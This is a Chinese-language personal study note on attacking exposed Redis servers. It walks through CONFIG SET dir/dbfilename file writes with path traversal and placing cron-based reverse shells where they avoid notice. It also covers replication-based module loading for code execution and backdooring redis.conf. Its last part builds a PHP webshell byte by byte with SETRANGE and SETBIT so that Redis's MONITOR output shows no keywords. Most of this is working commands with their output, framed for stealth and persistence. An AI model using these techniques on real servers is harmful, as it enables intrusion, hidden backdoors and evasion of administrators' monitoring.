redis攻击篇-redis写文件 - 飘渺红尘✨

　　个人学习笔记1:

　　主题:redis写文件:

　　大量知识参考:http://redisdoc.com/

　　查看redis所有配置选项

config get \*

127.0.0.1:6379\> CONFIG GET \*
  1) "dbfilename"
  2) "dump.rdb"
  3) "requirepass"
  4) ""
  5) "masterauth"
  6) ""
  7) "unixsocket"
  8) ""
  9) "logfile"
 10) ""
 11) "pidfile"
 12) ""
 13) "slave-announce-ip"
 14) ""
 15) "maxmemory"
 16) "0"
 17) "maxmemory-samples"
 18) "5"
 19) "timeout"
 20) "0"
 21) "auto-aof-rewrite-percentage"
 22) "100"
 23) "auto-aof-rewrite-min-size"
 24) "67108864"
 25) "hash-max-ziplist-entries"
 26) "512"
 27) "hash-max-ziplist-value"
 28) "64"
 29) "list-max-ziplist-size"
 30) "\-2"
 31) "list-compress-depth"
 32) "0"
 33) "set-max-intset-entries"
 34) "512"
 35) "zset-max-ziplist-entries"
 36) "128"
 37) "zset-max-ziplist-value"
 38) "64"
 39) "hll-sparse-max-bytes"
 40) "3000"
 41) "lua-time-limit"
 42) "5000"
 43) "slowlog-log-slower-than"
 44) "10000"
 45) "latency-monitor-threshold"
 46) "0"
 47) "slowlog-max-len"
 48) "128"
 49) "port"
 50) "6379"
 51) "tcp-backlog"
 52) "511"
 53) "databases"
 54) "16"
 55) "repl-ping-slave-period"
 56) "10"
 57) "repl-timeout"
 58) "60"
 59) "repl-backlog-size"
 60) "1048576"
 61) "repl-backlog-ttl"
 62) "3600"
 63) "maxclients"
 64) "10000"
 65) "watchdog-period"
 66) "0"
 67) "slave-priority"
 68) "100"
 69) "slave-announce-port"
 70) "0"
 71) "min-slaves-to-write"
 72) "0"
 73) "min-slaves-max-lag"
 74) "10"
 75) "hz"
 76) "10"
 77) "cluster-node-timeout"
 78) "15000"
 79) "cluster-migration-barrier"
 80) "1"
 81) "cluster-slave-validity-factor"
 82) "10"
 83) "repl-diskless-sync-delay"
 84) "5"
 85) "tcp-keepalive"
 86) "300"
 87) "cluster-require-full-coverage"
 88) "yes"
 89) "no-appendfsync-on-rewrite"
 90) "no"
 91) "slave-serve-stale-data"
 92) "yes"
 93) "slave-read-only"
 94) "yes"
 95) "stop-writes-on-bgsave-error"
 96) "yes"
 97) "daemonize"
 98) "no"
 99) "rdbcompression"
100) "yes"
101) "rdbchecksum"
102) "yes"
103) "activerehashing"
104) "yes"
105) "protected-mode"
106) "yes"
107) "repl-disable-tcp-nodelay"
108) "no"
109) "repl-diskless-sync"
110) "no"
111) "aof-rewrite-incremental-fsync"
112) "yes"
113) "aof-load-truncated"
114) "yes"
115) "maxmemory-policy"
116) "noeviction"
117) "loglevel"
118) "notice"
119) "supervised"
120) "no"
121) "appendfsync"
122) "everysec"
123) "syslog-facility"
124) "local0"
125) "appendonly"
126) "no"
127) "dir"
128) "/Users/qixin01/Downloads/redis-3.2.9/src"
129) "save"
130) "3600 1 300 100 60 10000"
131) "client-output-buffer-limit"
132) "normal 0 0 0 slave 268435456 67108864 60 pubsub 33554432 8388608 60"
133) "unixsocketperm"
134) "0"
135) "slaveof"
136) ""
137) "notify-keyspace-events"
138) ""
139) "bind"
140) ""

　　这边查看一共发现有140/2项

　　redis配置选项详解:

　　https://www.cnblogs.com/AlanLee/p/5924783.html

　　redis写文件注意点:

　　常规的:写计划任务,写ssh公钥

　　发现依赖了选项1和选项127,我们涉及到写文件离不开dir和dbfilename:

　　常规的不想提了,如ssh公钥和写计划任务

　　说点小技巧:

　　(1)关于dir选项:

　　dir声明目录支持../跳目录:

127.0.0.1:6379\> CONFIG SET dir /Users/\*\*/Desktop/log4jScan/../
OK
127.0.0.1:6379\> CONFIG SET dbfilename redis\_test2
OK
127.0.0.1:6379\> set payload "hello"
OK
127.0.0.1:6379\> save
OK

　　

　　查看文件:

　　

　　写文件发现,查看文件的时候:

　　发现有个前缀标识符:redis-bits?@?ctime,因为官方说明save,默认保存的是rdb文件,redis-bits?@?ctime就是rdb标识符,实战可以把它看成脏数据

　　(2)不要轻易尝试计划任务写bash反弹:

　　计划任务bash反弹是存在安全风险的

　　如下图所示:

　　

　　如果尝试以这种方法写bash反弹,会导致覆盖原来有的crontab计划任务,大家可以本地测试下就知道了

　　极其不推荐直接写到/var/spool/cron,一旦运维在crontab中配置了一些脚本启动,盲目的覆盖,会对业务产生极大的破坏

　　正确的做法是:选择一个开发不常用的计划任务:

　　以centos7为例子:

　　

　　对应的含义如下:每天/每日/每小时/每月/每周

　　可以写文件到/etc/cron.hourly/

　　可以覆盖0anacron文件 or 创建一个可执行的sh文件

　　覆盖0anacron,正常情况下,没人会在这里写计划任务,可以覆盖它:

　　

 　　创建可执行sh文件:如下所示:

　　

 　　这样就不会覆盖文件,比较保险

　　(3)redis 4.x/5.x ,redis 3.x不受影响 主从复制shell 选项(135) slaveof

　　主从复制优点:外部加载模块,可以落地无损文件,而不会有所谓的”脏数据”

　　redis module load是新特性,redis 3.x不存在

　　主从复制尽量保持redis版本一致:

　　什么是主从复制?

主从复制，是指将一台Redis服务器的数据，复制到其他的Redis服务器。前者称为主节点(master)，后者称为从节点(slave)；数据的复制是单向的，只能由主节点到从节点。
redis的持久化使得机器即使重启数据也不会丢失，因为redis服务器重启后会把硬盘上的文件重新恢复到内存中，但是如果硬盘的数据被删除的话数据就无法恢复了，如果通过主从复制就能解决这个问题，主redis的数据和从redis上的数据保持实时同步，当主redis写入数据是就会通过主从复制复制到其它从redis。

　　利用攻击:

127.0.0.1:6379\> SLAVEOF 119.45.227.86 6379
127.0.0.1:6379\> CONFIG GET slaveof
1) "slaveof"
2) "119.45.227.86 6379"
127.0.0.1:6379\> get b
"123"
127.0.0.1:6379\>

　　

　　同步给119.45.227.86:6379,保证6379开启

119.45.227.86:6379 客户端配置:
127.0.0.1:6379\> CONFIG SET protected-mode no
OK

　　远程在119.45.227.86:6379上操作:

127.0.0.1:6379\> CONFIG SET protected-mode no
OK
127.0.0.1:6379\> set ddd 123
OK
127.0.0.1:6379\>

　　

 　　本地127.0.0.1:6379客户端查看是否同步成功:

127.0.0.1:6379\> get b
"123"
127.0.0.1:6379\> get ddd
"123"
127.0.0.1:6379\> get ddd
"123"

　　

　　利用rce:https://paper.seebug.org/975/

　　linux就是加载so模块

　　windows就是加载dll模块

　　(4)还可以写文件到哪里?

　　除了ssh公钥/计划任务/网站绝对路径

　　1.覆盖写redis.conf中的配置选项,在管理员下次重启的时候生效,当作隐藏后门文件

　　.......

　　redis 隐蔽写文件bypass 敏感词监控研究:

　　需求如下:

　　需求:替换a为b

　　方法(1)redis setrange:

　　

127.0.0.1:6379\> set name a
OK
127.0.0.1:6379\> get name
"a"
127.0.0.1:6379\> SETRANGE name 0 b
(integer) 1
127.0.0.1:6379\> get name
"b"

　　redis写shell 敏感/特殊词监控 bypass:

127.0.0.1:6379\> set shell "<?> phpinfx();?>"
OK
127.0.0.1:6379\> SETRANGE shell 2 "php p"
(integer) 16
127.0.0.1:6379\> get shell
"<?php pinfx();?>"
127.0.0.1:6379\> SETRANGE shell 6 "phpinfo();"
(integer) 16
127.0.0.1:6379\> get shell
"<?php phpinfo();"
127.0.0.1:6379\> SETRANGE shell 15 ";?>"
(integer) 18
127.0.0.1:6379\> get shell
"<?php phpinfo();?>"
127.0.0.1:6379\>

　　这种是比较简单的,但是不够隐蔽,使用redis自带的语句监控MOITIOR命令还是可以明显很看出来:

　　monitor命令解释:实时打印出 Redis 服务器接收到的命令，调试用

　　

　　

　　更隐蔽的替换方法:

　　方法2:redis setbit命令:

　　先从修改a为b开始:

　　setbit的使用比setrange复杂的多,先了解前置知识:

　　ascii码表:

　　http://c.biancheng.net/c/ascii/

　　想要把a替换成b:

　　怎么做?

　　查询ascii码表,寻找a和b的对应的ascii 十进制:

　　a=ascii 97

　　b=ascii 98

 　　

　　十进制转换二进制:https://tool.lu/hexconvert/

　　ascii 97=01100001 = a

　　ascii 98=01100010 = b

　　如果想把a修改成b,对比发现两个值之间只有第六个位置和第七个位置不一样,所以我们只要修改第六个位置的0改成1,把第七个位置的1改成0,初始值键从0开始:

127.0.0.1:6379\> set name a
OK
127.0.0.1:6379\> SETBIT name 6 1
(integer) 0
127.0.0.1:6379\> SETBIT name 7 0
(integer) 1
127.0.0.1:6379\> get name
"b"
127.0.0.1:6379\>

　　

　　这样修改内容,就比方法1更隐蔽

　　如果是是多个字符串,怎么修改其中某个值?

　　例子如下:

　　　　

修改tett为test:

怎么做?
步骤如下:

(1)tett依次转换成ascii码表

t\=116

e\=101

t\=116

t\=116

(2)test依次抓换成ascii码表

t\=116

e\=101

s\=115

t\=116

(3)tett ascii码 十进制依次转换成2进制:

t\=116\=01110100

e\=101\=01100101

t\=116\=01110100

t\=116\=01110100

(4)test ascii码 十进制依次转换成2进制:

t\=116\=01110100

e\=101\=01100101

s\=115\=01110011

t\=116\=01110100

最后对比(3)和(4)即可:

合并:

(3):01110100011001010111010001110100

(4):01110100011001010111001101110100

目前是(3)就是tett,变成test:

对比从0位置开始数:

　　

127.0.0.1:6379\> set name "tett"
OK
127.0.0.1:6379\> SETBIT name 21 0
(integer) 1
127.0.0.1:6379\> SETBIT name 22 1
(integer) 0
127.0.0.1:6379\> SETBIT name 23 1
(integer) 0
127.0.0.1:6379\> get name
"test"
127.0.0.1:6379\>

　　查看语句监控:

 　　

　　隐蔽性很强,不能直接看到关键字

参考资料:

(1)https://mp.weixin.qq.com/s?__biz=MzIzOTE1ODczMg==&mid=2247484020&idx=1&sn=06db219408f093c65d252c506ad502df

(2)http://redisdoc.com/